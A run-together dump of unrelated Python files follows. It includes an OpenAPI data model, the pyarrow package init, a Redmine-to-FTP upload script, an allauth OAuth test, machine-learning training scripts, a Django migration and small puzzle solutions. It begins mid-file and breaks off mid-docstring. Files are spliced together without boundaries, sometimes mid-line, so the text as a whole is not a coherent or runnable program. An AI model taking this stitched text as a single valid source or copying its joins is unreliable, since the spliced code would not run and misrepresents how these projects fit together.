:param pin_caps: The pin_caps of this DesignPin. # noqa: E501 :type: list[PinCap] """ self._pin_caps = pin_caps @property def power_count(self): """Gets the power_count of this DesignPin. # noqa: E501 :return: The power_count of this DesignPin. # noqa: E501 :rtype: int """ return self._power_count @power_count.setter def power_count(self, power_count): """Sets the power_count of this DesignPin. :param power_count: The power_count of this DesignPin. # noqa: E501 :type: int """ self._power_count = power_count @property def function(self): """Gets the function of this DesignPin. # noqa: E501 :return: The function of this DesignPin. # noqa: E501 :rtype: str """ return self._function @function.setter def function(self, function): """Sets the function of this DesignPin. :param function: The function of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and function is not None and len(function) < 1): raise ValueError("Invalid value for `function`, length must be greater than or equal to `1`") # noqa: E501 self._function = function @property def internal_node(self): """Gets the internal_node of this DesignPin. # noqa: E501 :return: The internal_node of this DesignPin. # noqa: E501 :rtype: str """ return self._internal_node @internal_node.setter def internal_node(self, internal_node): """Sets the internal_node of this DesignPin. :param internal_node: The internal_node of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and internal_node is not None and len(internal_node) < 1): raise ValueError("Invalid value for `internal_node`, length must be greater than or equal to `1`") # noqa: E501 self._internal_node = internal_node def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, DesignPin): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, DesignPin): return True return self.to_dict() != other.to_dict() # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. 
See the License for the # specific language governing permissions and limitations # under the License. # flake8: noqa from pkg_resources import get_distribution, DistributionNotFound try: __version__ = get_distribution(__name__).version except DistributionNotFound: # package is not installed try: # This code is duplicated from setup.py to avoid a dependency on each # other. def parse_version(root): from setuptools_scm import version_from_scm import setuptools_scm.git describe = (setuptools_scm.git.DEFAULT_DESCRIBE + " --match 'apache-arrow-[0-9]*'") # Strip catchall from the commandline describe = describe.replace("--match *.*", "") version = setuptools_scm.git.parse(root, describe) if not version: return version_from_scm(root) else: return version import setuptools_scm __version__ = setuptools_scm.get_version('../', parse=parse_version) except (ImportError, LookupError): __version__ = None from pyarrow.lib import cpu_count, set_cpu_count from pyarrow.lib import (null, bool_, int8, int16, int32, int64, uint8, uint16, uint32, uint64, time32, time64, timestamp, date32, date64, float16, float32, float64, binary, string, decimal128, list_, struct, union, dictionary, field, type_for_alias, DataType, Field, Schema, schema, Array, Tensor, array, chunked_array, column, from_numpy_dtype, NullArray, NumericArray, IntegerArray, FloatingPointArray, BooleanArray, Int8Array, UInt8Array, Int16Array, UInt16Array, Int32Array, UInt32Array, Int64Array, UInt64Array, ListArray, UnionArray, BinaryArray, StringArray, FixedSizeBinaryArray, DictionaryArray, Date32Array, Date64Array, TimestampArray, Time32Array, Time64Array, Decimal128Array, StructArray, ArrayValue, Scalar, NA, BooleanValue, Int8Value, Int16Value, Int32Value, Int64Value, UInt8Value, UInt16Value, UInt32Value, UInt64Value, HalfFloatValue, FloatValue, DoubleValue, ListValue, BinaryValue, StringValue, FixedSizeBinaryValue, DecimalValue, Date32Value, Date64Value, TimestampValue) # Buffers, allocation from pyarrow.lib import (Buffer, ResizableBuffer, foreign_buffer, py_buffer, compress, decompress, allocate_buffer) from pyarrow.lib import (MemoryPool, total_allocated_bytes, set_memory_pool, default_memory_pool, log_memory_allocations) from pyarrow.lib import (HdfsFile, NativeFile, PythonFile, FixedSizeBufferWriter, BufferReader, BufferOutputStream, OSFile, MemoryMappedFile, memory_map, create_memory_map, have_libhdfs, have_libhdfs3, MockOutputStream) from pyarrow.lib import (ChunkedArray, Column, RecordBatch, Table, concat_tables) from pyarrow.lib import (ArrowException, ArrowKeyError, ArrowInvalid, ArrowIOError, ArrowMemoryError, ArrowNotImplementedError, ArrowTypeError, ArrowSerializationError, PlasmaObjectExists) # Serialization from pyarrow.lib import (deserialize_from, deserialize, deserialize_components, serialize, serialize_to, read_serialized, SerializedPyObject, SerializationContext, SerializationCallbackError, DeserializationCallbackError) from pyarrow.filesystem import FileSystem, LocalFileSystem from pyarrow.hdfs import HadoopFileSystem import pyarrow.hdfs as hdfs from pyarrow.ipc import (Message, MessageReader, RecordBatchFileReader, RecordBatchFileWriter, RecordBatchStreamReader, RecordBatchStreamWriter, read_message, read_record_batch, read_schema, read_tensor, write_tensor, get_record_batch_size, get_tensor_size, open_stream, open_file, serialize_pandas, deserialize_pandas) localfs = LocalFileSystem.get_instance() from pyarrow.serialization import (default_serialization_context, register_default_serialization_handlers, 
register_torch_serialization_handlers) import pyarrow.types as types # Entry point for starting the plasma store def _plasma_store_entry_point(): """Entry point for starting the plasma store. This can be used by invoking e.g. ``plasma_store -s /tmp/plasma -m 1000000000`` from the command line and will start the plasma_store executable with the given arguments. """ import os import pyarrow import sys plasma_store_executable = os.path.join(pyarrow.__path__[0], "plasma_store") os.execv(plasma_store_executable, sys.argv) # ---------------------------------------------------------------------- # Deprecations from pyarrow.util import _deprecate_api # noqa frombuffer = _deprecate_api('frombuffer', 'py_buffer', py_buffer, '0.9.0') # ---------------------------------------------------------------------- # Returning absolute path to the pyarrow include directory (if bundled, e.g. in # wheels) def get_include(): """ Return absolute path to directory containing Arrow C++ include headers. Similar to numpy.get_include """ import os return os.path.join(os.path.dirname(__file__), 'include') def get_libraries(): """ Return list of library names to include in the `libraries` argument for C or Cython extensions using pyarrow """ return ['arrow_python'] def get_library_dirs(): """ Return lists of directories likely to contain Arrow C++ libraries for linking C or Cython extensions using pyarrow """ import os import sys package_cwd = os.path.dirname(__file__) library_dirs = [package_cwd] if sys.platform == 'win32': # TODO(wesm): Is this necessary, or does setuptools within a conda # installation add Library\lib to the linker path for MSVC? site_packages, _ = os.path.split(package_cwd) python_base_install, _ = os.path.split(site_packages) library_dirs.append(os.path.join(python_base_install, 'Library', 'lib')) return library_dirs """ Web APIリクエストルートマッパーモジュール """ from bpmappers import Mapper, DelegateField from .body.body import RunSimRequestBodyMapper from .header.header import RequestHeaderMapper class RunSimulationInputMapper(Mapper): """ シミュレーション実行リクエストマッパーオブジェクト """ head = DelegateField(RequestHeaderMapper) body = DelegateField(RunSimRequestBodyMapper) class RunSimulationRequestMapper(Mapper): """ シミュレーション実行リクエストマッパー """ simulation_input = DelegateField(RunSimulationInputMapper) upura/nlp100v2020ch07/ans63.py import numpy as np from gensim.models import KeyedVectors def cosSim(v1, v2): return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2)) model = KeyedVectors.load_word2vec_format('ch07/GoogleNews-vectors-negative300.bin', binary=True) result = model.most_similar(positive=['Spain', 'Athens'], negative=['Madrid']) for i in range(10): print("{}: {:.4f}".format(*result[i])) # -*- coding: utf-8 -*- __author__ = '' __email__ = '' __version__ = '0.1.0'2020/day8/puzzle1.py import utils def main(): instructions = utils.read_input_file("code_instructions.txt") acc = 0 index = 0 visited = set() while index not in visited: visited.add(index) op, value = instructions[index].split(" ") print(f"Index: {index}\tOp: {op}\tValue: {value}") if op == "jmp": index += int(value.strip()) continue if op == "acc": acc += int(value.strip()) index += 1 if index in visited: print(f"Exiting early...") print(f"Acc = {acc}") if __name__ == "__main__": main() Tim232/Python-Things1-10 from sqlite3 import * conn = connect('C:/sqlite/Score.db') csr = conn.cursor() csr.execute("SELECT * FROM Score ORDER BY score DESC") result = csr.fetchall() for r in result: print(r) Machine-Learning-Builds/ML-python-catboost-trainingapp.py # 
coding=utf-8 import json import os import numpy as np from catboost import CatBoostClassifier, Pool, cv from sklearn.model_selection import train_test_split from catboost.datasets import titanic # get training data train, test = titanic() # remove nans train, test = train.fillna(-999), test.fillna(-999) # split into train and test X, y = train.drop(['PassengerId', 'Survived'], axis=1), train['Survived'] X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8) # define categorical features cat_indices = np.where(X_train.dtypes != float)[0] # define model params params = {'iterations': 1000, 'depth': 2, 'loss_function': 'Logloss', 'eval_metric': 'F1', 'use_best_model': True, 'verbose': True} # define and train model model = CatBoostClassifier(**params) model.fit(X_train, y_train, cat_features=cat_indices, eval_set=(X_test, y_test)) # evaluate the quality of the model with 10-fold cross validation cv_data = Pool(data=X, label=y, cat_features=cat_indices) scores = cv(cv_data, model.get_params(), fold_count=10) # print f1 metric f1_metric = np.max(scores['test-F1-mean']) print(f"f1 score: {round(f1_metric, 3)}") # persist model model.save_model('model') # write metrics if not os.path.exists('metrics'): os.mkdir('metrics') with open('metrics/f1.metric', 'w+') as f: json.dump(f1_metric, f) # -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals from requests.exceptions import HTTPError from django.test.client import RequestFactory from django.test.utils import override_settings from django.urls import reverse from allauth.socialaccount.models import SocialToken from allauth.socialaccount.tests import OAuth2TestsMixin from allauth.tests import MockedResponse, TestCase, patch from .provider import YNABProvider @override_settings( SOCIALACCOUNT_AUTO_SIGNUP=True, ACCOUNT_SIGNUP_FORM_CLASS=None, ) # ACCOUNT_EMAIL_VERIFICATION=account_settings # .EmailVerificationMethod.MANDATORY) class YNABTests(OAuth2TestsMixin, TestCase): provider_id = YNABProvider.id def get_mocked_response(self): return MockedResponse( 200, """ {"data": { "user":{ "id": "" } } } """, ) def test_ynab_compelete_login_401(self): from allauth.socialaccount.providers.ynab_provider.views import ( YNABOAuth2Adapter, ) class LessMockedResponse(MockedResponse): def raise_for_status(self): if self.status_code != 200: raise HTTPError(None) request = RequestFactory().get( reverse(self.provider.id + "_login"), dict(process="login") ) adapter = YNABOAuth2Adapter(request) app = adapter.get_provider().get_app(request) token = SocialToken(token="some_token") response_with_401 = LessMockedResponse( 401, """ {"error": { "errors": [{ "domain": "global", "reason": "authError", "message": "Invalid Credentials", "locationType": "header", "location": "Authorization" } ], "code": 401, "message": "Invalid Credentials" } }""", ) with patch( "allauth.socialaccount.providers.ynab_provider.views" ".requests" ) as patched_requests: patched_requests.get.return_value = response_with_401 with self.assertRaises(HTTPError): adapter.complete_login(request, app, token) forestdussault/OLCRedmineAutomator import os import glob import click import ftplib import pickle import shutil import socket import sentry_sdk from amrsummary import before_send from automator_settings import SENTRY_DSN from nastools.nastools import retrieve_nas_files from automator_settings import FTP_USERNAME, FTP_PASSWORD @click.command() @click.option('--redmine_instance', help='Path to pickled Redmine API instance') @click.option('--issue', help='Path to 
pickled Redmine issue') @click.option('--work_dir', help='Path to Redmine issue work directory') @click.option('--description', help='Path to pickled Redmine description') def externalretrieve_redmine(redmine_instance, issue, work_dir, description): sentry_sdk.init(SENTRY_DSN, before_send=before_send) print('External retrieving!') # Unpickle Redmine objects redmine_instance = pickle.load(open(redmine_instance, 'rb')) issue = pickle.load(open(issue, 'rb')) description = pickle.load(open(description, 'rb')) try: os.makedirs(os.path.join(work_dir, str(issue.id))) # Parse description to figure out what SEQIDs we need to run on. fasta_list = list() fastq_list = list() fasta = False fastq = True for item in description: item = item.upper() if 'FASTA' in item: fasta = True fastq = False continue if 'FASTQ' in item: fastq = True fasta = False continue if fasta: fasta_list.append(item) elif fastq: fastq_list.append(item) # Use NAStools to put FASTA and FASTQ files into our working dir. retrieve_nas_files(seqids=fasta_list, outdir=os.path.join(work_dir, str(issue.id)), filetype='fasta', copyflag=True) retrieve_nas_files(seqids=fastq_list, outdir=os.path.join(work_dir, str(issue.id)), filetype='fastq', copyflag=True) # Check that we got all the requested files. missing_fastas = check_fastas_present(fasta_list, os.path.join(work_dir, str(issue.id))) missing_fastqs = check_fastqs_present(fastq_list, os.path.join(work_dir, str(issue.id))) if len(missing_fastqs) > 0: redmine_instance.issue.update(resource_id=issue.id, notes='WARNING: Could not find the following requested FASTQ SEQIDs on' ' the OLC NAS: {}'.format(missing_fastqs)) if len(missing_fastas) > 0: redmine_instance.issue.update(resource_id=issue.id, notes='WARNING: Could not find the following requested FASTA SEQIDs on' ' the OLC NAS: {}'.format(missing_fastas)) # Now make a zip folder that we'll upload to the FTP. shutil.make_archive(root_dir=os.path.join(work_dir, str(issue.id)), format='zip', base_name=os.path.join(work_dir, str(issue.id))) # Now need to login to the FTP to upload the zipped folder. # Lots of FTP issues lately - in the event that upload does not work, a timeout will occur. # Allow for up to 10 attempts at uploading. If upload has completed and we stall at the end, allow. upload_successful = upload_to_ftp(local_file=os.path.join(work_dir, str(issue.id) + '.zip')) # And finally, do some file cleanup. try: shutil.rmtree(os.path.join(work_dir, str(issue.id))) os.remove(os.path.join(work_dir, str(issue.id) + '.zip')) except: pass if upload_successful is False: redmine_instance.issue.update(resource_id=issue.id, status_id=4, notes='There are connection issues with the FTP site. Unable to complete ' 'external retrieve process. Please try again later.') else: redmine_instance.issue.update(resource_id=issue.id, status_id=4, notes='External Retrieve process complete!\n\n' 'Results are available at the following FTP address:\n' 'ftp://ftp.agr.gc.ca/outgoing/cfia-ak/{}'.format(str(issue.id) + '.zip')) except Exception as e: sentry_sdk.capture_exception(e) redmine_instance.issue.update(resource_id=issue.id, notes='Something went wrong! We log this automatically and will look into the ' 'problem and get back to you with a fix soon.') def upload_to_ftp(local_file): """ Since our FTP site has been misbehaving, we now get to have a special FTP uploader that tries to upload multiple times (up to 10). :param local_file: File that you want to upload to the FTP. Will be uploaded with the same name that the local file has. 
    :return: True if upload ended up being successful, False if even after 10 tries the upload didn't work.
    """
    num_upload_attempts = 0
    upload_successful = False
    while num_upload_attempts < 10:
        # Try uploading - if timeout, check if the upload managed to complete but hang at the end, which happens
        # sometimes. If it did complete, we're good to go. Otherwise, try again.
        try:
            s = ftplib.FTP('ftp.agr.gc.ca', user=FTP_USERNAME, passwd=FTP_PASSWORD, timeout=30)
            s.cwd('outgoing/cfia-ak')
            f = open(local_file, 'rb')
            s.storbinary('STOR {}'.format(os.path.split(local_file)[1]), f)
            f.close()
            s.quit()
            upload_successful = True
            break
        except socket.timeout:
            s = ftplib.FTP('ftp.agr.gc.ca', user=FTP_USERNAME, passwd=FTP_PASSWORD, timeout=30)
            s.cwd('outgoing/cfia-ak')
            uploaded_file_size = s.size(os.path.split(local_file)[1])
            s.quit()
            if uploaded_file_size == os.path.getsize(local_file):
                upload_successful = True
                break
        num_upload_attempts += 1
    return upload_successful


def check_fastas_present(fasta_list, fasta_dir):
    missing_fastas = list()
    for seqid in fasta_list:
        if len(glob.glob(os.path.join(fasta_dir, seqid + '*.fasta'))) == 0:
            missing_fastas.append(seqid)
    return missing_fastas


def check_fastqs_present(fastq_list, fastq_dir):
    missing_fastqs = list()
    for seqid in fastq_list:
        if len(glob.glob(os.path.join(fastq_dir, seqid + '*.fastq.gz'))) < 2:
            missing_fastqs.append(seqid)
    return missing_fastqs


if __name__ == '__main__':
    externalretrieve_redmine()
src/level1/level1.py
from string import ascii_lowercase


def main():
    # Shift characters by 2 positions
    cipher = ('g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc '
              'dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr\'q ufw rfgq rcv'
              'r gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw'
              ' ml rfc spj.')
    url = 'map'
    translation = str.maketrans(ascii_lowercase, ascii_lowercase[2:] + ascii_lowercase[:2])
    message = cipher.translate(translation)
    answer = url.translate(translation)
    print(message)
    print("Answer: " + answer)


if __name__ == '__main__':
    main()
import unittest

from augment.augmentors.translation.translation_augmentor import TranslationAugmentor
from augment.augmentors.noise.noise_augmentor import NoiseAugmentor


class TestAugmentors(unittest.TestCase):
    def test_translation_augmentor(self):
        original_sample = "A man inspects the uniform of a figure in some East Asian country."
        expected_augmented_sample = "A man inspects the uniform of a figure in an eastern Asian country."
        actual_augmentated_samples = TranslationAugmentor().try_augmentation_on_string(original_sample)
        self.assertIn(expected_augmented_sample, actual_augmentated_samples)

    def test_noise_augmentor(self):
        original_sample = "A man inspects the uniform of a figure in some East Asian country."
        expected_augmented_sample = "Actually a man inspects the uniform of a figure in some East Asian country."
actual_augmentated_samples = NoiseAugmentor().try_augmentation_on_string(original_sample) self.assertIn(expected_augmented_sample, actual_augmentated_samples) molo/surveys/migrations/0020_formfield_admin_label.py # -*- coding: utf-8 -*- # Generated by Django 1.9.13 on 2017-11-16 16:11 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('surveys', '0019_segmentusergroup'), ] operations = [ migrations.AddField( model_name='molosurveyformfield', name='admin_label', field=models.CharField(default=b'', help_text='Column header used during CSV export of survey responses.', max_length=256), ), migrations.AddField( model_name='personalisablesurveyformfield', name='admin_label', field=models.CharField(default=b'', help_text='Column header used during CSV export of survey responses.', max_length=256), ), ] 1-10 from typing import List from pddiansm.mapper.DefaultMapper import DefaultMapper from pddiansm.mapper.IMapper import IMapper from pddiansm.thesaurus.IThesaurusEntriesFound import IThesaurusEntriesFound from pddiansm.thesaurus.ThesaurusEntriesCollapsed import ThesaurusEntriesCollapsed class ISearchThesEntries: """ This class searches thesaurus entries (substances or drug classes") before searching PDDI """ def __init__(self): self.mapper = DefaultMapper() def search_moc(self, moc: str) -> IThesaurusEntriesFound: """ :param moc: a molecule or drug_class :return: thesaurus entries containing a list of substances and drug classes to search for PDDIs """ pass def search_string(self, string: str) -> IThesaurusEntriesFound: """ :param string: any string that could be map to substance(s) or drug_class(es) with a IMapper :return: thesaurus entries containing a list of substances and drug classes to search for PDDIs """ mocs: List[str] = self.mapper.get_mocs_mapped(string) return self.search_mocs(mocs, string) def set_mapper(self, mapper: IMapper): self.mapper = mapper def search_mocs(self, mocs: List[str], string: str) -> IThesaurusEntriesFound: muliple_thesaurus_entries: List[IThesaurusEntriesFound] = [self.search_moc(moc) for moc in mocs] thesaurus_entries_collapsed: ThesaurusEntriesCollapsed = ThesaurusEntriesCollapsed(string, muliple_thesaurus_entries) return thesaurus_entries_collapsed refactormachine/neuralocalize import numpy as np import traceback import feature_extraction as feature_extraction from utils.cifti_utils import load_cifti_brain_data_from_file from utils.utils import Subject method_to_nii = [ (feature_extraction.run_group_ica_separately, 'nii_path'), (feature_extraction.run_group_ica_together, 'nii_path'), (feature_extraction.run_dual_regression, 'nii_path'), (feature_extraction.get_subcortical_parcellation, 'nii_path'), (feature_extraction.set_correlation_coefficients, 'nii_path'), ] def abstract_test(method_to_test, nii_path): """Test pattern for the module: runs the method and checks that the result is the same. :param method_to_test: The method we wish to test :param nii_path: The path holding the expected matlab matrix. """ actual_output = method_to_test() # todo(kess) Ask Noam how to integrate with her tests. def run_get_subcortical_parcellation_test(): cifti_image, brain_models = load_cifti_brain_data_from_file( r'..\test_resources\GROUP_PCA_rand200_RFMRI.dtseries.nii') abstract_test( # TODO this path is not in the git. 
Should be added into resources lambda: feature_extraction.get_subcortical_parcellation(cifti_image, brain_models), r'..\..\matlab_results\SC_clusters.dtseries.nii') def run_group_ica_separately_test(): cifti_image, brain_models = load_cifti_brain_data_from_file( r'..\test_resources\GROUP_PCA_rand200_RFMRI.dtseries.nii') abstract_test( lambda: feature_extraction.run_group_ica_separately(cifti_image, brain_models) , r'..\..\matlab_results\ica_LR_MATCHED.dtseries.nii') def run_group_ica_together_test(): cifti_image, brain_models = load_cifti_brain_data_from_file( r'..\test_resources\GROUP_PCA_rand200_RFMRI.dtseries.nii') abstract_test( lambda: feature_extraction.run_group_ica_together(cifti_image, brain_models) , r'..\..\matlab_results\ica_both_lowdim.dtseries.nii') def set_correlation_coefficients_test(): sc_cifti_image, _ = load_cifti_brain_data_from_file( r'..\test_resources\SC_clusters.dtseries.nii') # sc_cifti_image = np.ones([2, 4]) # TODO(loya) validate these are the actual files. subjects = [Subject('noam', left_right_hemisphere_data_path=r'..\test_resources\100307_DR2_nosmoothing.dtseries.nii', sessions_nii_paths=[ r'..\test_resources\rfMRI_REST1_LR\rfMRI_REST1_LR_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\rfMRI_REST1_RL\rfMRI_REST1_RL_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\rfMRI_REST2_LR\rfMRI_REST2_LR_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\rfMRI_REST2_RL\rfMRI_REST2_RL_Atlas_hp2000_clean.dtseries.nii'])] # subjects[0].left_right_hemisphere_data = np.ones([4, 4]) # for session in subjects[0].sessions: # as_line = np.arange(6*4) / 1000 # session.cifti = np.reshape(as_line, [6, 4]) # print("session.cifti:", session.cifti) feature_extraction.set_correlation_coefficients(sc_cifti_image.transpose(), subjects) ret = subjects[0].correlation_coefficient actual_output, _ = load_cifti_brain_data_from_file(r'..\test_resources\noam_results\100307_RFMRI_nosmoothing.dtseries.nii') print("Diff norm:", np.linalg.norm(ret - actual_output)) print("RET shape:", ret.shape, "actual shape:", actual_output.shape) print("RESULT:", np.allclose(actual_output, ret)) def run_dual_regression_test(): dt, brain_models = load_cifti_brain_data_from_file( r'..\test_resources\ica_LR_MATCHED.dtseries.nii') # TODO(loya) notice there are more parameters such as ROIs subjects = [Subject( 'noam', sessions_nii_paths=[ r'..\test_resources\Subjects\100307\MNINonLinear\Results\rfMRI_REST1_LR\rfMRI_REST1_LR_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\Subjects\100307\MNINonLinear\Results\rfMRI_REST1_RL\rfMRI_REST1_RL_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\Subjects\100307\MNINonLinear\Results\rfMRI_REST2_LR\rfMRI_REST2_LR_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\Subjects\100307\MNINonLinear\Results\rfMRI_REST2_RL\rfMRI_REST2_RL_Atlas_hp2000_clean.dtseries.nii' ])] # TODO(loya) this is out of date. The test doesn't return value, but updates the .left_right... field in subjects. 
    feature_extraction.run_dual_regression(dt.transpose(), brain_models, subjects)
    print(subjects[0].left_right_hemisphere_data)
    # abstract_test(
    #     lambda: feature_extraction.run_dual_regression(dt.transpose(), brain_models, subjects)
    #     , r'..\test_resources\100307_DR2_nosmoothing.dtseries.nii')


# try:
#     run_group_ica_together_test()
# except Exception:
#     traceback.print_exc()
# try:
#     run_group_ica_separately_test()
# except Exception:
#     traceback.print_exc()
# try:
#     set_correlation_coefficients_test()
# except Exception:
#     traceback.print_exc()
# try:
#     run_get_subcortical_parcellation_test()
# except Exception:
#     traceback.print_exc()
# run_dual_regression_test()
run_dual_regression_test()
"""
Created on 12 Aug 2016

@author: ()
"""

# --------------------------------------------------------------------------------------------------------------------

class LockTimeout(RuntimeError):
    """
    classdocs
    """

    def __init__(self, name, ident):
        """
        Constructor
        """
        self.__name = name
        self.__ident = ident

    # ----------------------------------------------------------------------------------------------------------------

    @property
    def name(self):
        return self.__name

    @property
    def ident(self):
        return self.__ident

    # ----------------------------------------------------------------------------------------------------------------

    def __str__(self, *args, **kwargs):
        return "LockTimeout:{name:%s, ident:%s}" % (self.name, self.ident)
import tensorflow as tf
import numpy as np
from collections import namedtuple
import math
from Model import AlexNet
from Dataset import Dataset
import random
from VGG import vgg_net

# FedModel is a namedtuple holding the model handles: x, y, drop_rate, train_op, loss_op, acc_op
FedModel = namedtuple('FedModel', 'X Y DROP_RATE train_op loss_op acc_op')


# federated-model client class
class Clients:
    def __init__(self, input_shape, num_classes, learning_rate, clients_num):
        self.graph = tf.Graph()
        self.sess = tf.Session(graph=self.graph)
        # build the AlexNet network
        net = AlexNet(input_shape, num_classes, learning_rate, self.graph)
        #net = vgg_net(input_shape, num_classes, learning_rate, self.graph)
        self.model = FedModel(*net)
        # initialize the variables
        with self.graph.as_default():
            self.sess.run(tf.global_variables_initializer())
        # load the data
        # split the dataset according to the number of training clients
        self.dataset = Dataset(tf.keras.datasets.cifar10.load_data, split=clients_num)
        #self.dataset = Dataset(tf.keras.datasets.mnist.load_data,split=clients_num)

    # evaluate the model accuracy on the test set
    def run_test(self, num, save=False):
        with self.graph.as_default():
            batch_x, batch_y = self.dataset.test.next_batch(num)
            # feed the batch in place of X, Y, etc. in the computation graph
            feed_dict = {
                self.model.X: batch_x,
                self.model.Y: batch_y,
                self.model.DROP_RATE: 0
            }
        return self.sess.run([self.model.acc_op, self.model.loss_op], feed_dict=feed_dict)

    def train_epoch(self, cid, batch_size=256, dropout_rate=0.7):
        dataset = self.dataset.train[cid]
        with self.graph.as_default():
            for _ in range(math.ceil(dataset.size // batch_size)):
                #for _ in range(1):
                batch_x, batch_y = dataset.next_batch(batch_size)
                batch_x = data_augmentation(batch_x, batch_y)  # apply data augmentation
                feed_dict = {
                    self.model.X: batch_x,
                    self.model.Y: batch_y,
                    self.model.DROP_RATE: dropout_rate
                }
                self.sess.run(self.model.train_op, feed_dict=feed_dict)

    # return the values of all trainable variables in the computation graph
    def get_client_vars(self):
        """ Return all of the variables list """
        with self.graph.as_default():
            client_vars = self.sess.run(tf.trainable_variables())
        return client_vars

    def set_global_vars(self, global_vars):
        with self.graph.as_default():
            all_vars = tf.trainable_variables()  # get all trainable variables
            for variable, value in zip(all_vars, global_vars):
                variable.load(value, self.sess)  # load the variables sent by the server into the model

    # randomly select a `ratio` fraction of clients and return their indices
    def choose_clients(self, ratio=1.0):
        client_num = self.get_clients_num()
        choose_num = math.floor(client_num * ratio)
        return np.random.permutation(client_num)[:choose_num]

    def get_clients_num(self):
        # return the number of clients
        return len(self.dataset.train)


# data augmentation
def _random_crop(batch, crop_shape, padding=None):
    oshape = np.shape(batch[0])
    if padding:
        oshape = (oshape[0] + 2*padding, oshape[1] + 2*padding)
    new_batch = []
    npad = ((padding, padding), (padding, padding), (0, 0))
    for i in range(len(batch)):
        new_batch.append(batch[i])
        if padding:
            new_batch[i] = np.lib.pad(batch[i], pad_width=npad, mode='constant', constant_values=0)
        nh = random.randint(0, oshape[0] - crop_shape[0])
        nw = random.randint(0, oshape[1] - crop_shape[1])
        new_batch[i] = new_batch[i][nh:nh + crop_shape[0], nw:nw + crop_shape[1]]
    return new_batch


def _random_flip_leftright(batch, batch_y):
    for i in range(len(batch)):
        '''
        filpped_le_re=tf.image.random_flip_left_right(batch_x[i])  # random left-right flip
        print(type(filpped_le_re))
        np.concatenate(batch_x,filpped_le_re)
        batch_x.append(filpped_le_re)
        batch_y.append(batch_y[i])
        filpped_up_down=tf.image.random_flip_up_down(batch_x[i])  # random up-down flip
        batch_x.append(filpped_up_down)
        batch_y.append(batch_y[i])
        # randomly set the image contrast
        image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
        batch_x.append(image)
        batch_y.append(batch_y[i])
        # randomly set the image hue
        image2 = tf.image.random_hue(image, max_delta=0.3)
        batch_x.append(image2)
        batch_y.append(batch_y[i])
        adjust=tf.image.random_brightness(filpped_up_down,0.4)
        batch_x.append(adjust)
        batch_y.append(batch_y[i])
        '''
        if bool(random.getrandbits(1)):
            batch[i] = np.fliplr(batch[i])
    return batch


def data_augmentation(batch_x, batch_y):
    batch = _random_flip_leftright(batch_x, batch_y)
    batch = _random_crop(batch, [32, 32], 4)
    return batch
import torch
import pandas as pd

from graph import Graph, Node

# https://graphsandnetworks.com/the-cora-dataset/
def read_cora(path):
    g = Graph()
    contents = pd.read_csv(f'{path}/cora.content', delimiter='\t', header=None)
    cites = pd.read_csv(f'{path}/cora.cites', delimiter='\t')
    indexes = contents.iloc[:, 0].values
    index_dict = {v: i for i, v in enumerate(indexes)}
    features = contents.iloc[:, 1:-1].values
    print(features.shape, features.max(axis=0))  #--> (2708, 1433)
    for idx, i in index_dict.items():
        #print(idx, i)
        g.add(Node(i, idx))
    labels = contents.iloc[:, -1]
    label_dict = {v: i for i, v in enumerate(labels.unique())}
    labels = labels.apply(label_dict.get).values
    #print(labels, labels.shape, labels.max()) --> [0 1 2 ...
5 6 0] (2708,) 6 edges = cites.values for n1, n2 in edges: g[index_dict[n1]].add_neighbor(g[index_dict[n2]]) g[index_dict[n2]].add_neighbor(g[index_dict[n1]]) features, labels = torch.FloatTensor(features), torch.LongTensor(labels) return g, features, labels, len(label_dict) def split_data(g, features, labels, splits): s0, s1, s2 = splits[0], splits[0] + splits[1], splits[0] + splits[1] + splits[2] train_g, train_features, train_labels = g.split_graph(0, s0), features[:s0], labels[:s0] valid_g, valid_features, valid_labels = g.split_graph(s0, s1), features[s0:s1], labels[s0:s1] test_g, test_features, test_labels = g.split_graph(s1, s2), features[s1:s2], labels[s1:s2] train_g.finalize(), valid_g.finalize(), test_g.finalize() return (train_g, train_features, train_labels), \ (valid_g, valid_features, valid_labels), \ (test_g, test_features, test_labels) if __name__ == "__main__": g, features, labels, n_classes = read_cora('cora')# -*- coding:utf-8 -*- from ais_sdk.moderation_text import moderation_text_aksk from ais_sdk.utils import init_global_env if __name__ == '__main__': # # access moderation text enhance,posy data by ak,sk # app_key = '*************' app_secret = '************' init_global_env(region='cn-north-1') # call interface use the text result = moderation_text_aksk(app_key, app_secret, '', 'content') print resultmarkgras/salt """ Microsoft Updates (KB) Management This module provides the ability to enforce KB installations from files (.msu), without WSUS or Windows 